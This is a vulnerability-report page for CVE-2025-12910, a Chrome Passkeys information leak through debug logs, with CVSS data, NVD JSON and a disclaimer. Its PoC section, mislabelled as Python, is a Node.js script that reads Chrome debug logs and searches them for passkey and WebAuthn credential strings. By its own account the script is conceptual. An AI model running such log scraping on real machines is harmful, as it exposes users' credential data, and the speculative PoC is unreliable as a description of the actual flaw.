Security Vulnerability Report
中文
CVE-2025-12910 CVSS 6.2 MEDIUM

CVE-2025-12910

Published: 2025-11-08 00:15:36
Last Modified: 2025-11-21 21:19:05
Source: [email protected]

Description

Inappropriate implementation in Passkeys in Google Chrome prior to 140.0.7339.80 allowed a local attacker to obtain potentially sensitive information via debug logs. (Chromium security severity: Low)

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
Google Chrome < 140.0.7339.80 (所有桌面平台)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-12910 PoC - Local attacker accessing Chrome debug logs // Note: This is a conceptual PoC demonstrating the attack vector const fs = require('fs'); const path = require('path'); // Common Chrome debug log locations const debugLogPaths = { linux: path.join(process.env.HOME || '', '.config/google-chrome/chrome_debug.log'), mac: path.join(process.env.HOME || '', 'Library/Application Support/Google/Chrome/chrome_debug.log'), windows: path.join(process.env.LOCALAPPDATA || '', 'Google/Chrome/User Data/chrome_debug.log') }; // Attack scenario: Local attacker reads debug logs for Passkey information function exploitPasskeyInfoLeak() { const platform = process.platform; const logPath = debugLogPaths[platform]; if (fs.existsSync(logPath)) { const logContent = fs.readFileSync(logPath, 'utf8'); // Search for Passkey-related sensitive information const passkeyPatterns = [ /passkey.*credential/i, /webauthn.*secret/i, /authenticator.*data/i, /challenge.*passkey/i ]; passkeyPatterns.forEach(pattern => { const matches = logContent.match(new RegExp(pattern, 'gi')); if (matches) { console.log('[+] Potential sensitive Passkey data found:'); console.log(matches.join('\n')); } }); } else { console.log('[-] Debug log not found at expected location'); } } exploitPasskeyInfoLeak(); // Mitigation: Disable debug logging or restrict log file access // Upgrade Chrome to version >= 140.0.7339.80

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12910", "sourceIdentifier": "[email protected]", "published": "2025-11-08T00:15:35.817", "lastModified": "2025-11-21T21:19:05.317", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inappropriate implementation in Passkeys in Google Chrome prior to 140.0.7339.80 allowed a local attacker to obtain potentially sensitive information via debug logs. (Chromium security severity: Low)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1295"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "140.0.7339.80", "matchCriteriaId": "614C3A2A-11F8-45CE-BEF0-9033AD4AE057"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2025/09/stable-channel-update-for-desktop.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/434977743", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.